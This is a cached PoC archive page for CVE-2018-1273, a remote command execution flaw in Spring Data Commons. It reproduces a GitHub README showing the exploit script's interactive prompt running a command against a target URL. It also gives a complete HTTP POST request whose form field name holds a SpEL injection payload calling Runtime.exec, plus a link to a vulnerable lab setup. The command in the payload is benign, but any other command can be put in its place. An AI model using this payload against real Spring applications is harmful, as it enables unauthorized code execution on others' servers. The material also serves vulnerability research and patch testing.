Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-1273 PoC — Pivotal Software Spring Data Commons和Spring Data REST 输入验证错误漏洞

Source
https://github.com/jas502n/cve-2018-1273
Associated Vulnerability
Title:Pivotal Software Spring Data Commons和Spring Data REST 输入验证错误漏洞 (CVE-2018-1273)
Description:Pivotal Software Spring Data Commons和Pivotal Software Spring Data REST都是美国Pivotal Software公司的产品。Pivotal Software Spring Data Commons是一款数据共享接口。Pivotal Software Spring Data REST是一款能够在Spring Data之上构建超媒体驱动的REST Web服务的产品。 Pivotal Software Spring Data Commons和S
Description
Spring Data Commons RCE 远程命令执行漏洞
Readme
# CVE-2018-1273
Spring Data Commons RCE 远程命令执行漏洞

## usage
![](./test.jpg)

```
C:\Users\CTF\Desktop>python cve-2018-1273.py


  ______   ______    ___  ___ ______     ______ ________
 / ___/ | / / __/___|_  |/ _ <  ( _ )___<  /_  /_  /_  /
/ /__ | |/ / _//___/ __// // / / _  /___/ / __/ / //_ <
\___/ |___/___/   /____/\___/_/\___/   /_/____//_/____/

                 author: jas502n

     example: http://10.10.20.166:8080/account



Set Url: http://10.10.20.166:8080/account

Cmd >>: touch /tmp/jas502n

405, May Have a CVE-2018-1273 vulnerability!

CVE-2018-1273 Vulnerability Exit!

Cmd >>:

```
![](./web.jpg)
## BurpSuite request:
```
POST /account HTTP/1.1
Host: 10.10.20.166:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 96
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
cache-control: no-cache
Cookie: sidebar_collapsed=false
X-Forwarded-For: 127.0.0.2
Content-Type: application/x-www-form-urlencoded

name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('touch /tmp/jas502n')]=test
```

## 漏洞环境:

https://github.com/wearearima/poc-cve-2018-1273

```
mvn spring-boot:run

```
File Snapshot

 [4.0K]  /data/pocs/d7c3f6d0a15d1ba89dd5805f835b62989faa2b54
├── [2.8K]  cve-2018-1273.py
├── [1.3K]  README.md
├── [171K]  test.jpg
├── [4.0K]  Vulnerability-environment
│   ├── [ 11K]  LICENSE
│   ├── [6.3K]  mvnw
│   ├── [4.9K]  mvnw.cmd
│   ├── [2.1K]  pom.xml
│   ├── [1.3K]  README.md
│   └── [4.0K]  src
│       ├── [4.0K]  main
│       │   ├── [4.0K]  java
│       │   │   └── [4.0K]  eu
│       │   │       └── [4.0K]  arima
│       │   │           └── [4.0K]  poccve20181273
│       │   │               ├── [ 331]  PocCve20181273Application.java
│       │   │               └── [ 548]  VulnerableController.java
│       │   └── [4.0K]  resources
│       │       └── [   0]  application.properties
│       └── [4.0K]  test
│           └── [4.0K]  java
│               └── [4.0K]  eu
│                   └── [4.0K]  arima
│                       └── [4.0K]  poccve20181273
│                           └── [ 348]  PocCve20181273ApplicationTests.java
└── [295K]  web.jpg

13 directories, 13 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.